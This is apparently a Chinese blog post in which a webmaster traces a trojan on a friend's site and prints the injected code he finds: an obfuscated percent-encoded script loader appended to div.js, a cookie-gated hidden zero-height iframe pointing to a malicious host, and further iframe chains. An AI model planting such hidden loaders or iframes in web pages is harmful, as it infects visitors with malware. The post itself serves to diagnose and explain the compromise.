昨晚深邃网友一诺小朋友向我报告说友情链接有一个网站有木马,我一看,晕,那个不是我正在帮朋友做关
http://www.pcliver.***\/10\/zz.htm width=100 height=0><\/iframe>”);window.status=” “;}
我想问题应该出在js代码上,于是在代码搜索js,一个是51la的统计的js,另外一个是div.js,51la的自然可以排除,所以我就打开div.js,然后看到了下面“此地无银三百两”的网址代码(红色字体的),一路跟踪下去,果然发现可疑迹象。
// JavaScript Document
function showdiv(divnum,divbefor,id){
for(i=1;i<=divnum;i++){
try{
if(i==divbefor){
document.getElementById(id+i).style.display=”inline”;
}else{
document.getElementById(id+i).style.display=”none”;
}
}catch(e){ }
}
}
function menuFix(){}
document.writeln(”<script src=http:\/\/%78%69%73%68%69%79%69%2E%63%6F%6D\/images\/main\/info.js><\/script>”);
跟踪代码:http:\/\/%78%69%73%68%69%79%69%2E%63%6F%6D\/images\/main\/info.js
firefox直接输入,转换得到地址如下http://www.91q.***/templets/images/div.js打开代码如下:
var az=document.cookie;
var za=az.indexOf(”qqqq”);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”qqqq=web;expires=”+expires.toGMTString();
document.writeln(”<iframe src=http:\/\/kkwwkkc.***/10/zz.htm
打开代码如下:
<iframe src=123.htm width=100 height=0></iframe>
<script language=”javascript” type=”text/javascript” src=”http://js.users.51.la/2191926.js”></script>
<noscript><a href=”http://www.51.la/?2191926″ target=”_blank”><img alt=”我要啦免费统计” src=”http://img.users.51.la/2191926.asp” style=”border:none” /></a></noscript>
继续iframe跟踪:http://kkwwkkc.***/archives/279.html
